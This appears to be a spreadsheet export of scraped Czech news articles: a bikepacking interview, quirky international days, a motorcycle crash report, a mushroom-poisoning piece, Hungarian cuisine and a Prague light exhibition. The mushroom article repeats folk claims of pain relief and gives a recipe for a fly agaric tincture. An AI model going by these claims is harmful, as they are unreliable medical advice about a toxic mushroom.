bikepacker Říká se, že když někdo v mládí přičichne k cyklistice, tak je to pak vášeň na celý život. To ale ještě nebyly ani horská kola. Bohužel už si nepamatuji, kam jsme to přesně vyrazili. Ale jezdili jsme všude možně. Pamatuji si, že jsme si třeba jednou rozdělali oheň a v noci na nás přišli lidé, že jsme se utábořili u někoho na zahradě. I to se může stát. Čtěte také Jiří Štrupl staví solární kola: Po Evropě se pohybujeme už běžně, ale v Africe to byla velká atrakce Kam nejdál jste takto vyrazil? Nebo jaký byl váš nejdelší závod nebo prostě cyklistický výlet? Pokud myslíte dobu, kdy jsem byl sám se sebou na kole, tak v tomto zase nejsem až takový extrémista. Ale takový asi nejdelší výlet byl, když jsem vyrazil začátkem letošního roku na závody do Maroka . Letěl jsem do Španělska , kde jsem si vyjel na nějaké hory, abych se aklimatizoval. Potom jsem se vydal přes Gibraltar a přes půlku Maroka až do pohoří Atlas. Poznal jsem tam místní lidi, což je podle mne velice důležité. Pokud někam vyrazíte, tak se přiblížit lidem i tamní krajině. V Maroku jsem měl spoustu věcí s sebou, protože tam třeba jen tak nekoupíte náhradní plášť nebo řetěz. Tak jsem cestoval a snažil se pochopit místní obyvatele a jejich zvyky. Pak po měsíci odstartoval závod, na který jsem byl perfektně aklimatizovaný. Máte za sebou závodů jistě hodně. Který z nich byl nejextrémnější? To je těžká otázka, ale vždy se mi zdá nejtěžší ten poslední závod. Ale je to dáno i počasím. Když je počasí horší, tak je závod určitě extrémnější. Ať je to na poušti nebo v dešti. Což byl právě teď už zmíněný závod Alps Divide 2024. Tam bylo extrémně ošklivé počasí. A tento sport je hodně o tom, kam jste schopen posouvat své limity a hranice. Co si musí závodník na kolo všechno sbalit, aby mohl trasu absolvovat? Tak to je další hodně složitá otázka. Něco jiného je to pro člověka, který s bikepackingem začíná nebo jezdí třeba rok. Já jsem si třeba teď na ty závody ve Francii nebral spacák ani náhradní rukavice. Protože to je všechno zátěž. Každý gram je v kopcích přítěží. Protože trasa nebyla jen o tisíci kilometrech vzdálenosti, ale také o 32 kilometrech převýšení. To je už extrémní převýšení na trase. Mám takovou tabulku, kde si píši do šroubečku rozpis věcí, které s sebou beru. Kdybychom to detailně rozebírali, tak bychom nad tím strávili možná hodinu. Čtěte také Polévka a pivo . To je super kombinace na cyklistické ultramaratony, směje se Daniel Polman Už jste si také někdy něco důležitého zapomněl vzít s sebou? Vždy mne něco překvapí, ale pokaždé to byly maličkosti, které se daly nějak vyřešit. Jaký byl tedy onen závod ve Francii ? Říkal jste, že počasí bylo náročné. Závod se konal na začátku září a ve Francii bylo tou dobou extrémně ošklivé počasí. Nikdo to nepředpokládal, ani místní farmáři a organizátoři závodu. Opravdu bylo po celou dobu hodně hnusně. Těšil jsem se, že budu projíždět srdcem Alp, ale z trasy jsem viděl velice málo. Protože jsem jel buď v noci, nebo přes den, kdy bylo ale opravdu extrémně ošklivé počasí. Nicméně byly krásné chvilky, když vyšlo sluníčko. To si pak člověk užíval. Byly těžké chvíle, když jsem jel nahoru do kopce a silně pršelo. Najednou ve výšce přes tisíc metrů nad mořem přestalo pršet, ale začalo mrznout. Člověk byl úplně mokrej a do toho mráz. Nebyla možnost nic dokoupit ani se nikde ohřát. V cíli nemám pocit nějak výrazně jiný. Pro mne je důležitá samotná cesta. A různé momenty, které si člověk nenaplánuje. Ty jsou hezké. Štěpán Stránský, ultra bikepacker Sáhl jste si někdy na samé dno? Že byste si během cesty řekl, tohle už nikdy? Tak to jsem si ještě nikdy neřekl. Ale musím přiznat, že teď v té Francii jsem si sáhl docela hluboko na dno sil. Byl to závod uprostřed Evropy , tak by si člověk řekl, že to zase nebude nijak extrémně těžké. Všude je civilizace, tak vás může někdy vždy zachránit. Ale bylo to pro mne dost náročné, i proto, že jsem měl málo vybavení. A také set-upem kola, neměl jsem schválně odpruženou vidlici, abych byl lehčí. Věděl jsem, že to bude velký handicap, ale na druhou stranu zase to byl poslední letošní závod, takže si mohu dovolit třeba dva měsíce po závodě regenerovat ruce. Tedy když se to vše sečetlo, tak to bylo dost náročné. Čtěte také Na kole z Broumova kolem světa s cestovatelem Martinem Stillerem aneb Cyklistika jako řemen! Jaký je to pak pocit v cíli, když zvládnete závod v tak extrémních podmínkách absolvovat? Pro mne osobně, myslím si na rozdíl od velké většiny jiných lidí, kteří se tomuto sportu věnují, není ten pocit nějak jinak výrazně jiný. Pro mne je důležitá především ta samotná cesta. Ale krásné je, když jsem dojel do cíle, tak tam čekala rodina. Objali jsme se a oni se o mě začali starat. To bylo super. Někdo třeba cítí v cíli i smutek, že závod skončil. Čekal jsem například v cíli na Petra Žemličku, dalšího Čecha, který dojel poslední. Myslím, že se ho to nijak nedotkne, když to tady řeknu, protože pro něj to byl super zážitek a super výkon. Bylo krásné se tam s ním setkat v cíli, kdy tam už nebyli ani organizátoři. A takové různé momenty, které si člověk nenaplánuje, ty jsou hezké. Kdy vás čeká další závod? Teď nic neplánuji. Měl bych, rád bych jel například do Kyrgyzstánu , ale to asi příští rok ještě neklapne. Pak jsou tam nějaké evropské závody, protože je to logisticky i finančně levnější. To je i důvod, proč se mi nechce jezdit do Ameriky . Protože to je už finančně někde úplně jinde. Štěpán Stránský ve studiu Českého rozhlasu Hradec Králové | foto: Milan Baják , Český rozhlas Naším hostem byl cyklista a ultra b ikepacker Štěpán Stránský . Děkuji za rozhovor. Autor: Milan Baják Autor Milan Baják Rubrika transition_slide Host ve studiu</t>
  </si>
  <si>
    <t>4980</t>
  </si>
  <si>
    <t>5150</t>
  </si>
  <si>
    <t>20241101_132_3244632623_6764cee25f4b42caefd8.html</t>
  </si>
  <si>
    <t>6764cee25f4b42caefd8</t>
  </si>
  <si>
    <t>Svátek bez kalhotek! Kalendář mezinárodních dnů šokuje. Co ještě slavíme?</t>
  </si>
  <si>
    <t>Svátek bez kalhotek! Kalendář mezinárodních dnů šokuje. Co ještě slavíme? Na dlouhém seznamu mezinárodních dnů najdeme bláznivé a vtipné svátky jako jsou například Mezinárodní dny trpaslíků, triček, piva či polibků. Můžeme slavit i Světový den toalet Den uklízení pracovních stolů nebo třeba Den gumových medvídků. Mezinárodně uznávané sváteční dny vyhlašuje obvykle Organizace spojených národů , ale také její organizace pro vzdělání, vědu a kulturu UNESCO, Světová zdravotnická organizace ( WHO ) a další nadnárodní instituce. Tyto dny připomínají většinou úspěchy dosažené lidstvem nebo různé hrozby a boj proti nim. Za dalšími dny stojí recese a v některých případech je na první pohled jasné, že se jedná o šikovný marketingový tah. Tachovsko Například teď v listopadu si většina lidí připomíná 2. 11. Památku zesnulých. Do našeho povědomí vstoupil také Mezinárodní den válečných veteránů 11. 11 nebo Mezinárodní den studentstva, který připadá na 17. 11.. Ale na seznamu najdeme i Mezinárodní den prasklých těsnění, který si připomeneme 11. 11. nebo Světový den toalet, ten se slaví 19. 11. stejně jako Mezinárodní den mužů. Blíží se Světový den televize a Světový den pozdravů, oba připadají na 21. 11.. Koncem listopadu můžeme ušetřit hned při dvou svátcích, čeká nás Mezinárodní den bez nákupů 25. 11., a také 28. 11. Mezinárodní den nekupování ničeho. Tachovsko K těm nejbizarnějším a nejvtipnějším dnům patří třeba 19. 1. Den popcornu, o den později můžeme oslavit Den milovníků sýrů a na 23. 1. připadá Den koláčů. Mezinárodní den luštěnin si připomeneme 10. února a zkrátka nepřijdou ani milovníci čokolády. Ti mohou slavit hned dvakrát, protože Mezinárodní den čokolády připadá na 13. září, ale Světový den čokolády na 7. července. Kdo rád mlsá gumové medvídky, může si jich dopřát, co hrdlo ráčí, na jejich svátek 15. července. Milovníci zlatého moku mají důvod k oslavě 5. 8., kdy si připomínáme Mezinárodní den piva . V kalendáři najdeme také Mezinárodní den švihlé chůze, který se slaví 7. 1. a Den uklízení pracovních stolů 11. 1.. Kdo rád nosí trička, může si užít jejich mezinárodní den 21. června. Trochu zvláštně působí Den bez kalhotek 22. 6. a Den suchého zipu, který připadá na 2. 8. V kalendáři najdeme i Ručníkový den 25. 5. a důvodem k oslavě může být také Mezinárodní den trpaslíků 21. 6.. Autor: Veronika Krátká Autor person Veronika Krátká Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>50060</t>
  </si>
  <si>
    <t>18700</t>
  </si>
  <si>
    <t>20241101_133_3264758166_a638d076f06a88f397f4.html</t>
  </si>
  <si>
    <t>a638d076f06a88f397f4</t>
  </si>
  <si>
    <t>Střet motocyklu s nákladním vozem</t>
  </si>
  <si>
    <t>Střet motocyklu s nákladním vozem Nákladní vůz z místa nehody odjel a motorkář skončil v péči záchranářů Autor: Petr Novák pátek 1. listopadu 15:22, aktualizace 17:49 Doprava Nehody Dnes před třetí hodinou odpoledne došlo v Jiráskově ulici v Klatovech k dopravní nehodě, během které se nákladní automobil střetl s motocyklem Yamaha . Z místa bylo hlášeno zranění motocyklisty, takže k nehodě vyjely všechny záchranné složky. Hasiči zajistili místo události, provedli protipožární opatření a ujali se řízení provozu, zatímco záchranáři si do péče převzali zraněného motocyklistu. "Dle dosud zjištěných skutečností jel řidič motocyklu Yamaha narozený v roce 1994 za dosud neustanoveným nákladním vozidlem, které mělo prudce brzdit. Řidič motocyklu pravděpodobně ve snaze zabránit střetu s nákladním vozidlem při brzdění spadl s motocyklem na pozemní komunikaci a následně narazil do zadní části nákladního vozidla, přičemž řidič nákladního vozidla pokračoval dál v jízdě. U řidiče motocyklu byl alkohol vyloučen provedenou dechovou zkouškou, příčinou a dalšími okolnostmi dopravní nehody se nadále zabývají dopravní policisté," uvedl k nehodě tiskový mluvčí policie. Foto PČR a HZS Autor: Petr Novák Autor person Petr Novák</t>
  </si>
  <si>
    <t>70500</t>
  </si>
  <si>
    <t>65870</t>
  </si>
  <si>
    <t>20241101_134_3244633024_4bc1e7ae3e284507020d.html</t>
  </si>
  <si>
    <t>4bc1e7ae3e284507020d</t>
  </si>
  <si>
    <t>Muchomůrka červená a zelená: od léčebných tradic k nebezpečí otravy</t>
  </si>
  <si>
    <t>Muchomůrka červená a zelená: od léčebných tradic k nebezpečí otravy Publikuje: David Bárta — 01. 11. 2024 Zdroj: David Bárta - redakční text Muchomůrka červená, ilustrační foto. Zdroj: EyeEm ze služby freepik Úvodní stránka » Muchomůrka červená a zelená: od léčebných tradic k nebezpečí otravy Muchomůrky červená a zelená jsou fascinujícími, avšak nebezpečnými houbami. Jejich použití je opředeno legendami, ale i rizikem smrtelné otravy. „ Účinky na zdraví: jak působí muchomůrky na lidský organismus? Muchomůrka červená (Amanita muscaria), s výrazným červeným kloboukem a bílými tečkami, se vyskytuje ve smíšených a jehličnatých lesích od července do listopadu. Obsahuje psychoaktivní látky, jako jsou muscimol a kyselina ibotenová, které vyvolávají halucinace, stav obluzení a mohou být toxické,“ uvádí k tématu Eva Kieslichová z Kliniky anesteziologie, resuscitace a intenzivní péče, Institutu klinické a experimentální medicíny , Praha a 1 . lékařská fakulta Univerzity Karlovy , Praha v tištěném časopisu a také na webu casopisvnitrnilekarstvi.cz. Nikdy se nesmí konzumovat v syrovém stavu – její jedovaté látky mohou způsobit závažnou otravu již po požití několika kusů, zatímco vyšší dávky mohou vést ke smrtelným následkům. „ Muchomůrka zelená (Amanita phalloides) je extrémně jedovatá houba, která způsobuje selhání jater a ledvin a je nejčastější příčinou smrtelných otrav houbami. Její hlavní toxiny – falotoxiny, amatoxiny a virotoxiny – působí nevratné poškození buněk a ničí červené krvinky. Smrtelná dávka pro dospělého člověka může být již 50 gramů, což z ní činí nejnebezpečnější jedovatou houbu u nás. Na rozdíl od jiných druhů muchomůrek je otrava touto houbou fatální, pokud se rychle neprovádí specializovaná léčba,“ vysvětluje dále casopisvnitrnilekarstvi.cz. Muchomůrka zelená a její možné záměny „Muchomůrka zelená bývá často zaměňována s nejedovatou muchomůrkou císařkou (Amanita caesarea), která je v některých kulturách dokonce považována za kulinářskou lahůdku. Muchomůrka císařka má oranžové lupeny a klobouk, zatímco muchomůrka zelená má klobouk zbarvený do zelených až olivových odstínů. Toto drobné odlišení však může být pro nezkušeného houbaře nebezpečné, a proto je důležité mít při sběru hub jistotu, že jde o bezpečný druh,“ uvádí online portál bylinkyprovsechny.cz. Příznaky otravy muchomůrkami „ Intoxikace muchomůrkou červenou probíhá ve dvou fázích. První fáze začíná po jedné až dvou hodinách od požití a zahrnuje příznaky, jako je mravenčení kůže, rozšíření zornic, sucho v ústech a rychlý tep. Postižený může mít tendenci k nadměrnému pohybu, výrazné pocení a zvýšené slinění. Druhá fáze, která následuje, se vyznačuje útlumem, ospalostí, halucinacemi a poruchami vědomí. Tyto příznaky obvykle ustoupí do 6–8 hodin bez trvalých následků, avšak v případě předávkování může dojít k vážným komplikacím, “ upřesňuje dále i otravě Eva Kieslichová z Kliniky anesteziologie, resuscitace a intenzivní péče, Institutu klinické a experimentální medicíny , Praha a 1 . lékařská fakulta Univerzity Karlovy , Praha v tištěném časopisu a na webu casopisvnitrnilekarstvi.cz. „ Otrava muchomůrkou zelenou má mnohem závažnější průběh a začíná zhruba po 6–12 hodinách od požití. První příznaky zahrnují silné bolesti břicha, zvracení a průjem, po nichž následuje latentní fáze, kdy se pacient cítí lépe. Toto „vylepšení“ však brzy střídají vážné problémy s játry a ledvinami, které mohou končit smrtelným selháním orgánů, pokud není poskytnuta odborná lékařská pomoc,“ doplňuje Eva Kieslichová. Legendy a zajímavosti: historie muchomůrek Muchomůrka červená je v severských zemích opředena mýty a legendami. Germánské národy ji spojovaly s bohem Odinem, a podle jedné z legend vznikly muchomůrky z pěny jeho koně během pronásledování čerta po obloze. V německy mluvících zemích je známa jako „Fliegenpilz“ neboli létací houba, což odkazuje na její schopnost vyvolat halucinace. Ve středověku byla údajně používána čarodějnicemi k výrobě létacích mastí, které jim měly umožnit dosáhnout změněného stavu vědomí. Je známo, že mouchy, které sají šťávu z muchomůrky červené, upadají do jakéhosi „komatu“ a po několika hodinách se probouzejí. Tento efekt dal vzniknout jejímu názvu a rovněž byl zdrojem fascinace ve starověkých kulturách, které věřily, že houba má zvláštní magické vlastnosti. Zevní využití muchomůrky červené: tinktura na bolest „ Muchomůrka červená nachází své využití i v oblasti tradiční medicíny, zejména ve formě tinktur a mastí, které se používají při bolestech svalů, dně, artróze či ischiasu. Obsahuje analgetické a protizánětlivé látky, což ji činí oblíbenou v alternativní léčbě. Tinktura z muchomůrky červené může poskytnout úlevu při svalových křečích, což ocení i sportovci po intenzivní fyzické námaze,“ vysvětluje v krátké citaci web leciveja.cz. Recept na tinkturu z muchomůrky červené: Nasbírejte čerstvé kloboučky muchomůrky červené a důkladně je očistěte. Vyhněte se kontaminaci zeminou nebo listím. Nakrájejte kloboučky na menší kousky a vložte je do čisté sklenice. Přelijte 40% až 60% alkoholem tak, aby byly houby zcela ponořené. Sklenici uzavřete a umístěte ji na tmavé a chladné místo po dobu 4–6 týdnů. Po této době tekutinu přeceďte do lahvičky s kapátkem. Použití: Tinktura je určena pouze pro zevní použití. Aplikujte několik kapek na postižené místo a jemně masírujte, abyste podpořili úlevu od bolesti či zánětu. Použité zdroje: casopisvnitrnilekarstvi.cz, bylinkyprovsechny.cz, leciveja.cz Dále použity redakční informace, poznatky a zdroje – redakční text * Upozorňujeme, že informace, publikované články, rady a doporučení prezentované na webové stránce www.zdravizivot.cz neslouží jako náhrada za individuální lékařskou péči poskytovanou lékařem! Tyto informace nelze považovat za lékařskou konzultaci nebo doporučení pro konkrétního pacienta či pacienty. Informace zveřejněné na této stránce neslouží k nahrazování individuální léčby a jsou pouze obecnými informacemi na dané téma. Související články Autor: David Bárta Autor person David Bárta Rubrika transition_slide Babské rady</t>
  </si>
  <si>
    <t>5980</t>
  </si>
  <si>
    <t>3650</t>
  </si>
  <si>
    <t>20241101_135_3244611785_d669c5ef3f819c63e536.html</t>
  </si>
  <si>
    <t>d669c5ef3f819c63e536</t>
  </si>
  <si>
    <t>Prozkoumejte taje sladce žhavé maďarské kuchyně, která inspirovala i mnoho našich národních pokladů</t>
  </si>
  <si>
    <t>Prozkoumejte taje sladce žhavé maďarské kuchyně, která inspirovala i mnoho našich národních pokladů Maďarský hovězí guláš se zeleninou Zdroj: iStock Zavřít Maďarský hovězí guláš se zeleninou Zdroj: iStock První obyvatelé maďarských nížin sem dorazili z asijských stepí. Ale nezůstali tu sami. Prakticky ve středu Evropy ležící úrodná krajina obdařená i pohořími s hustými lesy, jezery a řekami v čele s Dunajem a Tisou byla lákadlem i pro usedlíky ze západu i jihu kontinentu. A tak má maďarská kuchyně mnoho společného s tou středoevropskou, zároveň bychom v ní dodnes našli závany mnohem vzdálenějšího exotična. Všechny vlivy pak spojuje láska k pikantnímu ochucování, symbolizovaná všudypřítomnou paprikou. Sladká i pálivá Ano, nic není větším symbolem maďarské kuchyně jako paprika – a to do té míry, že se pod původním názvem používá i v dalších kuchyních světa, a pochopitelně i z Maďarska dováží. Konkurenta má jen ve španělské paprice, ale na tom není nic divného, neboť mají historicky mnoho společného. Byl to totiž Kryštof Kolumbus , respektive jeho objevné výpravy, který rostlinky papriky „přivezl“ do Evropy . Do Maďarska se pak dostaly nejspíš s dobyvačnými Turky, případně osídlenci z Balkánu , kteří před tureckou expanzí prchali do středu Evropy . Jiný příběh mluví o přímém spojení se Španělskem , kde už se paprika ujala a doznala popularity. Ať tak či tak, díky vhodným klimatickým podmínkám pro pěstování se brzy paprika ve své zeleninové i kořenicí podobě stala určujícím elementem maďarské kuchyně. Vyzkoušejte pravý segedínský guláš podle návodného videoreceptu Kompletní recept najdete ZDE: Klasický segedínský guláš krok za krokem Papriková pravidla Díky plošnému rozšíření papriky – pevnou součástí jejich kuchyně je už od konce 17. století – jsou Maďaři mistry i v zacházení s ní. Ve většině receptů je přidávána už na začátku procesu a často je součástí jíšky. Po zasmahnutí mouky v tuku je třeba nádobu sejmout ze zdroje tepla, vmíchat papriku a ihned také tekutinu a/nebo další suroviny. Pak se teprve nádoba vrátí zpět na oheň – tento postup zabrání, aby se vzhledem k vysokému obsahu těkavých olejů paprika začala pálit a hořknout. Další možností je promíchat zvolené množství papriky v troše oleje a pak směs vmíchat do pokrmu. Při správném zacházení jídlu předá paprika svou charakteristickou vůni, chuť, barvu i konzistenci. Centry (a konkurenty) pěstování a obchodu s paprikou jsou města Kalocsa a Szeged . Z druhého jmenovaného si ji roku 1879 odvezl slavný šéfkuchař Auguste Escoffier do svého proslulého hotelu v Monte Carlu a postaral se tak o rozšíření slávy „maďarského koření“ ve vysoké gastronomii. 56 Nejenom paprikou živ je Maďar Je-li paprika životodárným kořením maďarské kuchyně a jemnou či ostrou tečkou velké části tamních pokrmů, jejich základ vytváří takřka ve stejné míře maso a zelenina. Pověst a kvalita maďarského masa jsou příslovečné, ať už jde o hovězí dobytek (slavné je například tzv. šedé plemeno) či vepře, kdy trh v posledních letech dobývá plemeno Mangalica. Vepřové je také základem proslulých maďarských uzenin, v jejichž ochucování hraje prim opět paprika, a zdrojem sádla a slaniny, nejsolidnějších základů maďarské kuchyně. Uzeniny jsou kromě přímé konzumace také typickou surovinou v teplé kuchyni. Mimořádně oblíbeným masem je pak drůbež, jak velmi kvalitní kuřata (csirke), tak i proslulé husy (liba) a kachny (kacsa). Husy také poskytují skvělá játra včetně těch tučných a mýtických výšin dosahují husí škvarky z tučné kůže. Stejnou měrou jako maso pak ale maďarská kuchyně stojí i na zelenině. Pochopitelně jsou to skvostné papriky, rajčata, okurky, ale i zelí a kořenová zelenina – bez pestrosti barev, chutí a vůní prvotřídní zeleniny by maďarská kuchyně snad neexistovala. Zapomínat nesmíme ani na skvělé sladkovodní ryby, zvěřinu a bezpočet druhů těstovin, které patří mezi nejoblíbenější přílohy i samostatná jídla. 76 Prostá i elegantní Jsou-li nejznámější maďarské pokrmy jako je guláš, perkelt, slepice na paprice či lečo dětmi úrodného venkova a umu tamních hospodyň, v nichž najdeme i řadu stop po turecké kuchyni, nesmíme zapomínat ani na vlivy, které sebou přinesla všeobjímající náruč rakousko-uherského mocnářství. Maďaři či chcete-li Uhři v něm hráli velmi důležitou roli a jejich pokrmy se do tohoto amalgámu, jímž kuchyně středu Evropy je, zapsaly výrazným písmem – koneckonců podobně je tomu i s vlivy kuchyně Moravy a českých zemí. Ovlivňování bylo pochopitelně vzájemné a maďarské měšťanstvo, o šlechtě nemluvě, brzy a rádo nasávalo principy a postupy zjemnělé vídeňské kuchyně, jež byla sama ovlivněna gastronomií francouzskou. Proto na jedné straně najdeme v dobové české, rakouské i maďarské kuchyni takřka shodná jídla, často jen s minimem odlišností, a stejně tak můžeme v kuchyni maďarské vystopovat mnohá zjemnělá a komplikovaná jídla, která byla v mocnářství tak populární. Vídeňský řízek, jehněčí kotletky s chřestem i obliba bešamelu či tučných husích jater patřily k dobovým oblíbencům a jejich obliba přetrvává dodnes. Připravte domácí langoše podle návodného videoreceptu Kompletní recept najdete ZDE: Domácí smažené langoše z kynutého těsta Pojďte s námi do cukrászdy No těžko říct, zda jsme my vymysleli cukrárnu či Maďaři cukrászdu a to samé bude platit i o dobrotách, které tu najdeme. Obliba cukráren a kaváren v Maďarsku je příslovečná a bezpochyby se může rovnat té rakouské potažmo vídeňské. Snad nikde pak není tak dobře vidět, jak byly propojeny kulinární vlivy v rakousko-uherské říši a jak se do nich mnohdy promítla i francouzská vysoká cukrařina. Maďarské cukrárny jsou překrásné, zajít si do nich nejen při slavnostních příležitostech je pro místní hezké zpestření dne a že tu mohou očekávat pestrý výběr nádherných dortíků a proslulých dortů je samozřejmostí. Od plněných řezů s čokoládovým přelivem zserbószelet, vzniklých ve slavné cukrárně Gerbeaud, přes indiánky, krémeše s variací Franciakrémes se šlehačkou, čokoládové řezy s čokoládovou náplní Rigó Jancsi, větrníky s mandlovou posypkou (Képviselőfánk), čokoládový dort, punčový dort, Stefaniin dort (vrstvy těsta jsou prokládané čokoládovým krémem), dort Eszterházy z ořechového sněhového těsta spojovaný vanilkovým krémem, či světově proslulý dort Dobošův podle mistra cukráře Jószefa C. Dobose (vrstvy šlehaného piškotového těsta jsou spojeny máslovým krémem s kakaem a dort je pokryt placičkou z tvrdého karamelu, předkrájeným na řezy pro pozdější snadné krájení). Specialitou maďarské cukrařiny je také obliba marcipánu – figurky a bonbonky z něj jsou všudypřítomné – a pasty z jedlých kaštanů, která tvoří základ mnohých dezertů a krémů. Z méně složitých sladkostí musíme jmenovat palačinky (pálacsintá), které jsou maďarskou národní institucí a nejspíš i vynálezem. Tak třeba proslulé palačinky z cukrárny Gundel jsou plněné smetanovým vanilkovým krémem s mletými ořechy, rozinkami a pomerančovou kůrou a přelité čokoládou. Vyzkoušejte také domácí trdelník a připravte jej podle návodného videoreceptu Kompletní recept najdete ZDE: Domácí trdelník – vyzkoušejte recept na oblíbenou dobrotu Labužník končí sýrem… … a také ovocem. A pochopitelně vínem . A v Maďarsku je z čeho vybírat. Tradice domácích čerstvých sýrů, dnes pochopitelně vyráběných průmyslově, byla nejsilnější v oblasti Gomolya a ta také dala jméno celé této skupině. Původně se gomolyjské sýry připravovaly z ovčího mléka, později převážilo kravské, ale najdeme i kozí. Dalšími klasikami jsou sýry typu parenica, kaškaval či populární Hajdú. Proslavil se i sýr Óvár, připravovaný po vzoru německého Tilsiteru i domácí verze holandské goudy. K sýrovému prkénku si můžete dát i bezpočet druhů ovoce, od skvělých jablek, hrušek, třešní, višní a švestek, z nichž se samozřejmě připravuje i řada zavařenin, suší se a nakládají. Kvalitou vynikají i vlašské ořechy a již zmíněné jedlé kaštany (geszténye). Bezpochyby nejoblíbenějším nápojem je pak víno , Maďarsko se dnes v jejich kvalitě vyrovná třeba vínům rakouským, vinařství věnuje obrovskou péči, produkce vín však není velká a dá se říct, že většinu svých báječných moků si Maďaři vypijí sami. Největší výjimku tvoří dnes už i v zámoří slavné tokajské ve své dezertní podobě. Rozhodně pak stojí za to maďarské vinařské regiony, stejně tak jako tamní kuchyni, objevit na vlastní pěst. Není to tak daleko. Sezona jedlých kaštanů je tu: upečte si je doma v troubě podle prověřeného postupu A co ten guláš? Původní název pro maďarské pastevce dobytka se stal generickým pojmem i pokrmem, který dnes najdeme po celém světě. Ten originální, který si gulyásové připravovali (i dnes leckde připravují) v kotlíku nad ohněm se podobá spíš tomu, co my označujeme jako gulášovou polévku. Na vrstvu na kostičky nakrájené osmahnuté cibule v kotlíku se nasype na větší kousky nakrájené maso, vše se zasype hojnou vrstvou papriky a nechá se dusit, až je maso poloměkké. Pak se přidá na kostičky nakrájená mrkev a brambory, na plátky nakrájená paprika a dostatek vody. Pravý gulyás se nikdy nezahušťuje moukou, ale je možné do něj přidat lžíci rajčatového pyré. Je samozřejmě možné ho různě obohacovat, ale polévkovitý základ plus hovězí maso, to je klasika. Perkelt se často dělá i z vepřového, drůbeže, jehněčího či zvěřiny, maso je nakrájené na drobnější kostičky a je v něm víc papriky než v příbuzném paprikáši, který se navíc zjemňuje zakysanou smetanou. V tokáni je maso nakrájené na proužky, paprika chybí a je nahrazena majoránkou a černým pepřem, často se podlévá bílým vínem . K téhle skupině pokrmů byste v Maďarsku jako přílohu nejčastěji dostali nočky, tarhoňu, nudle či kukuřičnou kaši. Zdroj: autorský text, časopis Prima FRESH Autor článku Jitka Rákosníková Nejlepší recepty e-mailem Zanechte nám svůj e-mail a 1x týdně vás upozorníme na to nejnovější a nejlepší z našeho webu. Štítky jídlo kuchyně maso dort Maďarsko paprika pokrm cukrárna maďarská kuchyně Návrhy pro vás Autor: FTV Prima</t>
  </si>
  <si>
    <t>96630</t>
  </si>
  <si>
    <t>86280</t>
  </si>
  <si>
    <t>20241101_136_3244597702_2763b92f1f3c7aa00574.html</t>
  </si>
  <si>
    <t>2763b92f1f3c7aa00574</t>
  </si>
  <si>
    <t>Třetí ročník projektu „Světla vyprávějí…“se dnes otevírá ve Žlutých lázních</t>
  </si>
  <si>
    <t>Třetí ročník projektu „Světla vyprávějí…“se dnes otevírá ve Žlutých lázních Světelný park „Světla vyprávějí…“ se již potřetí vrací do Žlutých lázní v Praze . Více než stovka světelných soch a objektů tvořená čtyřmi sty tisíci světly ponese v letošní podzimní a zimní sezóně název „Zvonkova cesta vesmírem.“ Přináší ohromující podívanou inspirovanou příběhem pohádkové postavy Zvonka. Tento kouzelný průvodce Zvonek vezme malé i velké návštěvníky na nezapomenutelnou cestu tajemstvími vesmíru. Unikátní výstavu otevře areál od 1. listopadu 2024 do 31. ledna 2025 každý den po setmění. „Zvonkova cesta vesmírem“ zahrnuje planety, hvězdy, Slunce, kosmické lodě i astronauty a nabízí jak úchvatnou světelnou podívanou, tak i vzdělávací interaktivní prvky. Návštěvníci se prostřednictvím moderních technologií a animací seznámí s nejnovějšími vědeckými poznatky o vesmíru, které jsou zpracovány zábavnou a hravou formou, což zejména děti vtáhne do dobrodružství plného objevů. Spojení Vánoc s vesmírem Výstava propojuje vánoční atmosféru s kosmickými motivy. Betlémskou hvězdu zde symbolizuje kometa, která provází návštěvníky na cestě nekonečným prostorem, a na návštěvníky čeká také unikátní vesmírný strom splněných přání. Tento prvek propojuje tradiční vánoční symboliku s inovativními světelnými instalacemi. Ruční tvorba světelných soch: Umění, design a jedinečnost v každém detailu Světelné expozice „Světla vyprávějí…“ jsou zcela unikátní zejména tím, že jejich téma a zpracování respektují a doplňují místo, ve kterém jsou instalovány. Všechny světelné sochy a objekty jsou ručně vyráběny v české rodinné firmě Decoled pod vedením majitelky Evy Poláčkové. Tým zkušených designérů a řemeslníků společně pracuje na tom, aby každé dílo mělo svou jedinečnou tvář. Kreativní nápady jsou pečlivě zpracovávány po celý rok, aby se v zimních měsících mohly proměnit v ohromující světelné instalace. Každý vystavený kus je originální a nese rukopis talentovaných řemeslníků, kteří vdechují těmto dílům život. Ekologický přístup a interaktivní zážitky Celá výstava je navržena s důrazem na udržitelnost. LED diody a další světelné prvky jsou energeticky úsporné, a mnohé dekorace jsou vyrobeny z recyklovatelných plastů pomocí nejmodernějšího velkoplošného 3D tisku. Interaktivní prvky umožní návštěvníkům hravou formou objevovat vesmírná tajemství a díky environmentálnímu přístupu má expozice minimální dopad na životní prostředí. Odborná spolupráce „Zvonkova cesta vesmírem“ vznikla ve spolupráci s astronomy z Hvězdárny Žebrák a dalšími odbornými institucemi, což zajišťuje autenticitu a vzdělávací hodnotu expozice. Návštěvníci se mohou těšit nejen na vizuální zážitek, ale i na poutavé informace o vesmíru. Výjimečné místo pro sváteční setkávání Světelnou expozici Světla vyprávějí… připravila česká rodinná společnost Decoled . „Světla vyprávějí…“ nejsou jen vizuální podívanou, ale především místem, kde se lidé setkávají a společně sdílejí kouzelnou atmosféru svátků. „Naším přáním je nejen rozzářit veřejný prostor, ale také vnést světlo a inspiraci do života lidí. Chceme, aby každá expozice vkusně a citlivě kultivovala okolí a zároveň respektovala tradice a ducha místa, kam je zasazena. Letos budou naše světelné parky na patnácti místech po celé Evropě a těší nás, že mohou přinést radost všem,“ říká Eva Poláčková, majitelka společnosti Decoled . Zveme vás k jedinečnému zážitku Světelná expozice ve Žlutých lázních je příležitostí strávit volný čas netradičně a objevovat ztvárněné krásy vesmíru v klidném prostředí přímo u Vltavy . Výstava je otevřena denně od 1. listopadu 2024 do 31. ledna 2025. „Výstava nabízí možnost krásné zimní procházky na břehu Vltavy v areálu, který je jinak v tomto období zavřený. Zveme všechny, aby si přišli užít spojení s přírodou u zimní řeky, spolu s prohlídkou originálních instalací a vychutnali si třeba rodinný podvečer s vesmírnou atmosférou se sklenicí svařeného vína nebo horké čokolády,“ zve Jan Dell , ředitel areálu Žluté lázně v pražském Podolí . Foto: Decoled Tags: Světelný park Žluté lázně You may also like... Autor: redakce Rubrika transition_slide Z domova</t>
  </si>
  <si>
    <t>8980</t>
  </si>
  <si>
    <t>10560</t>
  </si>
  <si>
    <t>20241101_137_3244652698_5a814b9d63b8ccebd389.html</t>
  </si>
  <si>
